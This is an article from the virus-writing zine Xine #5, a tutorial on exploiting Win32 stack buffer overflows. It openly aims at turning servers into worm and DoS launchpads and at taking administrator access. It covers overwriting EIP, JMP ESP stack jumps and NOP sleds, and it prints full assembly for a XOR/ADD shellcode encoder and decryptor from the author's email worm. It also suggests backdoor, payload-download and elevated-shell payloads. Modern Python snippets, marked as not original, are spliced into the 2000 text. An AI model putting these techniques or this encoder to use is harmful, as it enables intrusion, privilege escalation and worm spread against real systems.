                                             ┌─────────────────────────────┐
                                             │ Xine - issue #5 - Phile 116 │
                                             └─────────────────────────────┘





 ────────────────────────────────────────────────────────────────────────
  A Crash-course in <WIN32> Buffer Overflows
 ────────────────────────────────────────────────────────────────────────
  Asmodeus iKX (c) 2000, xine#5 

 ────────────
 Basics : Introduction
 ────────────
  "Anarchists of the world unite!,
   Arsonists of the world, ignite!"


 "In tranquil silence Peter sits meditating in his pitch black cellar room,
 he's preparing for battle. The battle is not to be fought on this
 side of the realm, yet it requires full consciousness and awareness. He's a
 highly ranked leader following the arcane "black arts". Slowly he
 completes the trance session and fully embraces his digital form. In
 this realm he's known as Belzath, a notorious virus coder responsible
 for a handful of highly sophisticated and "successful" viruses. Unlike
 the companion by his side he dabbles with the forces of summoning; he
 never actually does battle himself. He's like the ominous spider watching
 silently from the safety of the darkness. His companion is a so-called dark
 master and skilled hacker who, unlike Belzath, prefers open yet concealed
 battle. Today's course is on how to enslave the minds of unsuspecting
 enemies. The hacker's voice echoes in Belzath's head as it floats over
 enormous distances in an instant: "To know your enemy is to defeat your
 enemy". Skillfully the dark master forms an exquisite web of creative power
 known as assembler.
 "The core of creation is channeled through threads of the one power,
 assembler!"
 In lucid enlightenment Belzath receives the flow of experience the dark
 master so kindly offers him, embraces it and slowly fades into the obscure
 darkness of his study."

 My lesson to you is how to enslave a processor and control it over any
 distance. With the knowledge you obtain from reading this article you will
 be able to transform an email server into a spawning pool for email worms,
 or maybe a virus launchpad or a DoS minion; the power lies in your hands. But
 just because you possess the power doesn't mean you should abuse it. It's
 your own decision, and don't blame me if your actions get you in trouble.
 A buffer overflow can also be exploited on a local machine to obtain
 administrator access. On NT workstations you often have a set of USER
 and ADMINISTRATOR access levels. Some programs need to be installed with
 the ADMINISTRATOR access level and hence execute at that access level. If
 you can snatch the EIP (extended instruction pointer) from such a program
 you will also be able to perform actions at the ADMINISTRATOR access level:
 the NT station is yours...
 
 So what is a buffer overflow? The name describes the condition pretty well.
 When a program stores data it can either keep it in precompiled static
 buffers in the .DATA section of the program or use dynamically allocated
 buffers on the stack (don't confuse this with global and virtual memory,
 which are allocated from the heap).

 So what is the stack? It's memory, BUT it's a bit different from ordinary
 memory. First of all it is handled in units of DWORDs: in 32-bit code PUSH
 and POP normally move ESP 4 bytes at a time, so you can't PUSH a single
 BYTE. You can of course push the value 01h, but it is extended to
 00000001h. What else should you know about the stack? It grows from higher
 memory addresses to lower, sort of from roof to floor. You PUSH things onto
 the stack and POP them back off. The name is also a give-away for how the
 data is stored: like on "a stack", or pile, of paper. What you put on last
 you have to remove first to reach the paper below. This is called LIFO,
 which means "last in, first out".

 Note that everything x86 stores in memory, the stack included, follows the
 little-endian format, which means multi-byte values are stored least
 significant byte first. It's not really reversed, it's just a matter of
 perspective :> the address 11223344h looks like this in a byte-by-byte
 memory dump: 44 33 22 11, see?

 KERNEL32.DLL could be seen as the main chapter of a book called "Night of
 the dead - Windows edition". When your program is started it is called from
 within a Windows API (maybe CreateProcessA?) and Windows allocates a preset
 amount of stack, which is defined in the PE header (stack commit, stack
 reserve). ESP holds the stack pointer, which points to the top of the stack
 (remember, it grows from roof to floor). HLLs usually use EBP (the extended
 base pointer) as a frame pointer, while virus coders usually use it as a
 delta offset pointer. Anyway, when you call an API or any other HLL routine
 a stack frame is built. It is built by the "procedure prologue", which
 basically saves the old EBP and then copies ESP into EBP (EBP stays fixed
 while ESP changes). I'll tell you more about the appearance of the stack
 frame later. There is no real "universal rule" for how a frame should look,
 but most HLL compilers build them in a certain way. You can't avoid having
 the return address and the parameters on the stack, but virus coders
 usually don't use EBP as a frame pointer. Well, as our "enemies" aren't
 virus coders, who cares? :> Know your enemy, remember?

 OK, so the return address and parameters are on the stack; what's next? The
 routine hopefully uses some kind of dynamic buffer and "cuts" a hole in the
 stack right below the saved EBP (I'll explain the structure of the stack
 frame later). Let's say the buffer holds 3 DWORDs (3*4 = 12 bytes). What
 happens if you squeeze 24 bytes into the buffer?
 A BUFFER OVERFLOW!!! You write past the buffer boundaries and into
 restricted territory, BUT there is no one there to guard the precious data.
 What is also nice is that you can execute code on the stack, it makes no
 difference, cool! :> If you overflow the buffer correctly you can easily
 redirect the return address and snatch the EIP of the process, i.e. the
 execution!
 "To hold infinity in the palm of your hand and the processor in an hour."

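 The byte order described above is what x86 calls little-endian: the least
 significant byte of a DWORD sits at the lowest address. A minimal sketch in
 Python (not part of the original BOAL.ASM; the helper names dword_bytes and
 hexdump are made up for this illustration) shows how 11223344h appears in a
 memory dump:

```python
import struct


def dword_bytes(value):
    """Return the 4 bytes of a 32-bit value in x86 (little-endian) memory order."""
    return struct.pack("<I", value)


def hexdump(data):
    """Format bytes the way a debugger's memory dump shows them."""
    return " ".join(f"{b:02X}" for b in data)


address = 0x11223344
print(hexdump(dword_bytes(address)))  # prints "44 33 22 11"
```

 Reading the four bytes back with struct.unpack("<I", ...) gives 11223344h
 again, which is why it's "just a matter of perspective".
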
 ────────────
 Goin' deeper : Chapter I 
 ────────────

(Primary objectives : Probing the area)

 ────────────
 Primary objectives : Probing the area
 ────────────

 So what about that stack-frame I was talking about: what does it look like,
 how is it built and what is it good for? Well, this is how it is built:

 push   00000003h ; PUSH parameter 3 on stack
 push   00000002h ; PUSH parameter 2 on stack
 push   00000001h ; PUSH parameter 1 on stack
 call   function  ; Return address is PUSHed on stack (OFFSET 00400300h)
 ;OFFSET 00400300h 

 ret              ; Return to previous frame (KERNEL32.DLL API)


 function proc local_var:DWORD
 push   ebp       ; PUSH old EBP on stack
 mov    ebp,esp   ; set EBP (base pointer->frame-pointer) so it points
                  ; to stack-pointers current location.

 sub    esp,12d   ; open stack buffer 

; Perform some action

 add    esp,12d   ; close stack buffer

 pop    ebp       ; Restore old EBP from stack (previous frame-pointer)
 ret              ; RETURN to the return address on stack (next paper on
                  ; the pile)
 function endp

 This is what it looks like:

 ┌───────────────────────────────────────────────┐
 │    Stack-frame graphical display              │
 │ ■ ..........                        .......   │
 │ ■ Parameter3                        4 bytes   │ OFFSET : 01000028d
 │ ■ Parameter2                        4 bytes   │ OFFSET : 01000024d
 │ ■ Parameter1                        4 bytes   │ OFFSET : 01000020d
 │ ■ Return Address                    4 bytes   │ OFFSET : 01000016d
 │ ■ Old EBP                           4 bytes   │ OFFSET : 01000012d
 ├───────────────────────────────────────────────┤
 │ ■ Buffer                           12 bytes   │ OFFSET : 01000000d
 :                                               :
 ·                                               ·
 ·                                               ·

 You pushed the parameters on the stack and called the routine. The CALL
 opcode puts the return address on the stack and jumps to the address of
 function(). function() performs a standard HLL "procedure prologue", which
 consists of putting the current EBP on the stack and then pointing EBP at
 the present ESP (stack-pointer) address. Our function() then digs a
 12 byte hole in the stack for our buffer and later fills it again,
 restores the old EBP from the stack and performs a RET, which
 transfers control to the return address now on top of the stack (the
 return address is sometimes AKA the instruction address). Now you know what
 a stack-frame looks like, how it is built and why. Btw, EBP is used as a
 reference point for local variables and parameters.
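
 The build-up of the frame can be replayed with a toy model. This is only a
 sketch in Python, not real stack memory: the Stack class, build_frame() and
 the starting address 01000032d are assumptions made for the illustration.
 With a 12 byte buffer starting at 01000000d the saved EBP necessarily ends
 up 12 bytes higher, at 01000012d.

```python
class Stack:
    """Toy model of a downward-growing 32-bit stack (illustration only)."""

    def __init__(self, top):
        self.esp = top      # stack pointer, moves down on every push
        self.slots = {}     # address -> label of what is stored there

    def push(self, label):
        self.esp -= 4       # the stack grows toward lower addresses
        self.slots[self.esp] = label

    def reserve(self, size, label):
        self.esp -= size    # models "sub esp,12d"
        self.slots[self.esp] = label


def build_frame(top=1000032):
    """Replay the caller's pushes, the CALL and the procedure prologue."""
    stack = Stack(top)
    for label in ("Parameter3", "Parameter2", "Parameter1"):
        stack.push(label)           # caller: push 3, push 2, push 1
    stack.push("Return Address")    # pushed by the CALL opcode
    stack.push("Old EBP")           # prologue: push ebp
    ebp = stack.esp                 # prologue: mov ebp,esp
    stack.reserve(12, "Buffer")     # sub esp,12d
    return stack, ebp


stack, ebp = build_frame()
for address in sorted(stack.slots, reverse=True):
    print(f"{address:08d}  {stack.slots[address]}")
```

 In this model the first parameter is found at EBP+8 and the buffer starts
 at EBP-12, which is what "EBP as a reference" means in practice.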

 ────────────
 Chapter II 
 ────────────

(Primary objectives : Finding buffer overflow)
(Secondary objectives : Overrun buffer)

 ────────────
 Primary objectives : Finding buffer overflow
 ────────────

To simplify things I'll use the buffer overflow condition and stack-frame
presented above. As a buffer can hold only a specific number of
bytes/characters, you'll have to either (1) disassemble the function and
"manually" check how large the buffer is, or (2) find out by the
"brute-force" approach, which means finding the buffer size by trial and
error. Notice that a buffer overflow only occurs if writes to the buffer are
unchecked. Some APIs that are unchecked are lstrcpy and lstrcat, along with
all HLL functions that incorporate them or do their own unchecked copying,
such as gets(), sprintf() and vsprintf().

Here is a modified version of the procedure function() above. The full
source of this program is called BOAL.ASM and can be found in Xine#5
[Utilities section].

buffer_proc PROC parameter_1:DWORD

;int     3h
;set a break point in the program so you can
;study it in action if you don't want to find buffer overflow by
;means of trial-and-error.

push    ebp
mov     ebp,esp

mov     esi,dword ptr [parameter_1] ; Pointer to memory address with NULL
                                    ; terminated string
sub     esp,12d                     ; Size of buffer <-- find this with method no. 1
mov     edi,esp                     ; EDI -> start of buffer

stuff_it_in:
cmp     byte ptr [esi],0            ; Check for NULL terminator
je      found_copy_end              ; IF found we're at end of string
cmp     byte ptr [esi],0dh          ; Check for Carriage Return
je      found_copy_end              ; IF found we're at end of string
cmp     byte ptr [esi],0ah          ; Check for Line Feed
je      found_copy_end              ; IF found we're at end of string
movsb                               ; Keep on movin baby :>
jmp     stuff_it_in                 ; You know what time it is.

found_copy_end:
;int     3h

add     esp,12d                     ; fix stack

pop     ebp                         ; Get old EBP back
ret                                 ; RETURN to saved Instruction pointer

buffer_proc endp


You call the above routine like this

lea     eax,string_i_want_to_copy
push    eax
call    buffer_proc

In C it looks like this

ReturnVal = buffer_proc(mem_address);

Where mem_address is a 32-bit integer pointing to a memory address containing
your NULL terminated string. You could use the function GetCommandLineA
to test different string lengths faster. You could also code a brute-forcer
that keeps feeding buffer_proc() strings of different lengths and
prints the string length that causes an access violation fault (requires a
SEH guard). Make sure you fill the buffer with values you will recognize as
HEX values. For instance, if you fill it with "x" characters (78h), EIP
should be redirected to the address 78787878h once the return address is
entirely overwritten.

Examples of method no. 2 (trial and error) for finding the buffer overflow
in the BOAL.ASM file:

boal.exe /x

<no result>
1 character (1 byte)

...

boal.exe /xxxxxxxxxxxxxxxx

<result = EBP = 78787878h>
16 characters (16 bytes)

boal.exe /xxxxxxxxxxxxxxxxxxxx

<result = EBP = 78787878h>
<         EIP = 78787878h>
<Access violation at address 78787878h>
20 characters (20 bytes)
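
Why 16 characters reach EBP and 20 reach EIP can be checked on paper, or with
a small model. The sketch below is Python, not the real BOAL.EXE: it lays out
a 12 byte buffer followed by the saved EBP and the return address in a
bytearray and copies the input over it without any length check. The saved
EBP value 0012FFC0h is a made-up placeholder and the return address 00400300h
is the one from the example in Chapter I.

```python
import struct

BUFFER_SIZE = 12  # matches "sub esp,12d" in buffer_proc


def simulate_copy(data, saved_ebp=0x0012FFC0, return_address=0x00400300):
    """Copy data over a model frame with no bounds check, like buffer_proc.

    Returns the (saved EBP, return address) pair as it looks after the copy.
    """
    frame = bytearray(BUFFER_SIZE)               # the 12 byte buffer
    frame += struct.pack("<I", saved_ebp)        # old EBP sits above it
    frame += struct.pack("<I", return_address)   # then the return address
    n = min(len(data), len(frame))               # the model ends at the frame
    frame[:n] = data[:n]
    return struct.unpack_from("<II", frame, BUFFER_SIZE)


for length in (1, 16, 20):
    ebp, ret = simulate_copy(b"x" * length)
    print(f"{length:2d} bytes: EBP = {ebp:08X}h  return address = {ret:08X}h")
```

With 1 byte nothing outside the buffer changes, with 16 bytes the saved EBP
reads 78787878h and with 20 bytes the return address does as well, matching
the three runs above.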

 ────────────
 Secondary objectives : Overrun buffer
 ────────────

EBP is overwritten first and then EIP... OK, that makes sense. Let's
take a look at the stack-frame and how it looks after the overflow:

 ┌───────────────────────────────────────────────┐
 │    Stack-frame graphical display              │
 │ ■ parameter_1           (87654321h) 4 bytes   │ OFFSET : 01000020d
 │ ■ Return Address [xxxx] (78787878h) 4 bytes   │ OFFSET : 01000016d
 │ ■ Old EBP        [xxxx] (78787878h) 4 bytes   │ OFFSET : 01000012d
 ├───────────────────────────────────────────────┤
 │ ■ Buffer [xxxxxxxxxxxx] (78h)*12   12 bytes   │ OFFSET : 01000000d
 :                                               :
 ·                                               ·
 ·                                               ·

If the buffer had been larger we could have fitted some code into
it and redirected the return address to the start of the buffer. But
with 12 bytes we can't do very much :> so we will have to overwrite the
stack beyond the return address with our code. parameter_1 will be
overwritten, but by then parameter_1 has already been fetched
from the stack; hopefully the routine won't use it again before the RET
opcode (operation code).

We now encounter the first problem: if the address we're going to redirect
EIP to contains a NULL byte we won't be able to have code beyond it, as the
NULL byte will serve as the terminator for the string and might even screw
up the new return address. So we have hit the wall; what can be done!? To
find the solution to this problem we must start up the debugger and have a
look at the state of the processor registers at the instant of the buffer
overflow. Often ESP points to the start of the buffer and EDI to the end of
the buffer. If you find a register that points somewhere inside the buffer
we could fill the buffer with NOPs (90h) and a jump instruction to the rest
of our code beyond the return address. ESP can often be used as well, but
how can a processor register value be used!? Well, we'll have to be smart.
You're smart, right? If so, you should have figured out by now how to
perform the stack jump. For the less fortunate I'll explain how ;> Btw, of
course you're smart, you downloaded Xine#5, didn't you?

Let's pretend ESP holds the address of the start of the buffer and we have
filled the buffer before the old EBP and return address with NOPs and a JMP
to 10 bytes beyond the return address. We now have to find a memory address
containing no NULL bytes that holds a JMP ESP or CALL ESP opcode. If you
find a code sequence that does something like PUSH ESP;RET you can use it
as well. If you don't know what OS version or service pack the software
runs on, it can be difficult to find a DLL that contains those bytes and
always loads at the same address on all OS versions (NT 4.0/5.0 and Win9x).
The best thing would be if the program itself used DLLs that had the wanted
opcode sequence at an address without NULL bytes. To find the opcode
sequence, compile some code that contains the opcode (JMP ESP for instance),
then start your debugger and check the hex value. NOP for instance has the
hex value 90h; to find a NOP opcode inside a DLL or program you could either
use your debugger or a hex editor and search for the opcode. SoftICE has the
command s (as in search); type HELP s for more info. Once you have found a
memory address that contains the wanted opcode and no NULL byte you can
use it as the new return address in your exploit code.

TIME OUT! I hope I didn't lose you, let's go through it once more... If the
stack address we wanted to redirect the return address to contained a NULL
byte and the buffer was too small to fit all of our code, we have to perform
a stack jump. That means we have to find a processor register that points
to a memory address we can fill with code. Once we have found such a
register we must find a memory address inside some DLL on the system that
holds a JMP <REG> or CALL <REG>, where <REG> is the register containing the
memory address we wanted to redirect the return address to. OK, so we now
have a memory address that points to a JMP <REG> opcode and contains no
NULL bytes, and <REG> points to our code...
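
Why a NULL byte in the address is such a problem can be seen by replaying the
copy loop of buffer_proc on the four bytes of an address. The sketch below is
a Python model, not code from BOAL.ASM; the function names and both sample
addresses (00401000h and 77F12345h) are made up for the illustration.

```python
import struct

TERMINATORS = {0x00, 0x0D, 0x0A}  # NULL, CR, LF: the bytes buffer_proc stops at


def copy_until_terminator(data):
    """Return the bytes a buffer_proc-style copy loop would actually copy."""
    copied = bytearray()
    for byte in data:
        if byte in TERMINATORS:
            break                 # the loop ends here, the rest never arrives
        copied.append(byte)
    return bytes(copied)


def survives_copy(address):
    """True if all four little-endian bytes of the address get copied."""
    packed = struct.pack("<I", address)
    return copy_until_terminator(packed) == packed


print(survives_copy(0x00401000))  # False: the very first byte in memory is 00h
print(survives_copy(0x77F12345))  # True: no NULL, CR or LF byte in it
```

Anything placed after an address that fails this check is cut off by the copy
routine, which is exactly the wall described above.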

 ────────────
 Chapter III  
 ────────────

(Primary objectives : Defeating bad opcode situation)
(Secondary objectives : Writing the payload)

 ────────────
 Primary objectives : Defeating bad opcode situation
 ────────────

We have redirected the return address to our code, but our code has to
be intact for it to work... so why wouldn't it be intact? Well, during
the buffer overflow it passes through a routine, often an API. So what?
Well, buffer overflows are common in string handling routines that keep
copying/moving the string bytes until they hit a NULL terminator. Some APIs
also stop at CR or LF bytes (0dh, 0ah). If your code contains any NULL
bytes, which it (almost) always does, you will have to encrypt it. Best
method is to combine XOR and ADD/SUB encryption. I coded this encryption
engine for I-Worm.Arcane; it finds an encryption scheme of XOR and ADD
combinations that produces encrypted code with no NULL/CR/LF characters.

call generate_decryptor

ret

generate_decryptor:

;int     3h

xor     edx,edx
mov     eax,arcane_total_size
add     eax,1d
push    eax
push    edx
call_   arcane_GlobalAllocA 

; Allocate arcane_total_size of bytes + 1 bytes of memory for the
; encrypted body.

mov     dword ptr [ebp+arcane_cryptmem],eax
; save the memory address

call    find_enc_keys
test    eax,eax
je      all_keys_bad

; check if we found an encryption scheme

;int     3h

mov     byte ptr [ebp+xor_val],al
mov     byte ptr [ebp+add_val],bl

; We found a scheme, and we save the values

all_keys_bad:

; either we found the keys or we found none :>

ret


find_enc_keys:
xor     eax,eax
restart_search:
lea     esi,[ebp+arcane_project]
mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
cld
rep     movsb

; Copy our code to the allocated memory

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
find_key:
inc     eax
enc_body:
xor     byte ptr [edi], al
inc     edi
loop    enc_body

; XOR encrypt it with the byte value in AL

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size

check_if_valid_enc:
cmp     al,255d
jae     no_more_byte_key
loop_the_enc_body:
cmp     byte ptr [edi],0
je      found_invalid_byte
cmp     byte ptr [edi],0ah
je      found_invalid_byte
cmp     byte ptr [edi],0dh
je      found_invalid_byte
inc     edi
loop    loop_the_enc_body
jmp     found_enc_key

; Check if code is valid or if it contains unwanted bytes

found_invalid_byte:
call    test_adds
test    ebx,ebx
je      restart_search

found_enc_key:
ret

no_more_byte_key:
xor     eax,eax
ret


test_adds:
xor     ebx,ebx

find_add:
mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
inc     ebx
add_body:
add     byte ptr [edi], bl
inc     edi
loop    add_body

; ADD encrypt the body (which already has a XOR layer)

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size

check_if_valid_add:
cmp     bl,255d
jae     no_more_add_byte
loop_the_add_body:
cmp     byte ptr [edi],0
je      found_invalid_add
cmp     byte ptr [edi],0ah
je      found_invalid_add
cmp     byte ptr [edi],0dh
je      found_invalid_add
inc     edi
loop    loop_the_add_body
jmp     found_add_key

; Check if code is valid or if it contains unwanted bytes

found_invalid_add:

mov     edi,dword ptr [ebp+arcane_cryptmem]
mov     ecx,arcane_total_size
sub_body:
sub     byte ptr [edi], bl
inc     edi
loop    sub_body
jmp     find_add

; Decrypt the body so we can check another ADD value


found_add_key:
ret

no_more_add_byte:
xor     ebx,ebx
ret

;db "decryptor_start",0

decryptor_start:

xor     eax,eax
xor     ecx,ecx
jmp     get_loc
got_loc:
pop     esi

mov     cx,arcane_total_size
xor_it:
sub     byte ptr [esi],0h
add_val equ $-1
xor     byte ptr [esi],0h
xor_val equ $-1
inc     esi
loop    xor_it

jmp     encrypted_start

get_loc:
call    got_loc
encrypted_start:

decryptor_end:

;db "decryptor ends here",0

decryptor_len   equ $-offset decryptor_start

As the code of the decryptor can't contain any NULL bytes either, we have to
code it smart as well (it can't be encrypted itself). To get offsets that
would contain NULL bytes if we hardcoded them, we make use of the way CALL
puts the return address on the stack and POP it into a register. Maybe like
this:

jmp     get_my_offset
got_it:
pop     edi ; EDI = THIS OFFSET
; rest of our decryptor etc
get_my_offset:
call    got_it
;THIS OFFSET
db "encrypted code here",0

We have the encrypted code in memory and have "generated" the decryptor
for the encrypted code. So what is next? The payload... we need some
code to be executed. Let your imagination flourish.

 ────────────
 Secondary objectives : Writing the payload
 ────────────

Now you have control and your code can execute, so what are you waiting for?
Do your work! Maybe open up a connection to the internet and download
some larger component; this is called an EGG procedure. You could also
open up a backdoor to the internet, or if you're on a local machine you
could execute some batch file with commands you want to perform at the
higher access level. Or perform them yourself. If you're on an NT
machine (duh) you could start a command prompt (CMD.EXE), which will run
at the higher access level, as will everything you do in it. I won't explain
how to obtain the API addresses. You could either fetch them from the
KERNEL32.DLL export directory as you do in win32 viruses, or fetch them from
the import table of the program you're exploiting, but sometimes it
doesn't import all the APIs you need. In that case look for the LoadLibrary
and GetProcAddress APIs in the import directory. I leave the rest to you.

 ────────────
 Appendix
 ────────────

NULL byte = NULL terminator  (00h)
CR        = Carriage Return  (0dh)
LF        = Line Feed        (0ah)
Opcode    = Operation code
EIP       = Extended Instruction Pointer
WORD      = Two bytes (2 bytes)
DWORD     = Double word (4 bytes)
RAM       = Random Access Memory (temporary storage [one boot-session])
HLL       = High-level language (like C++, Delphi etc)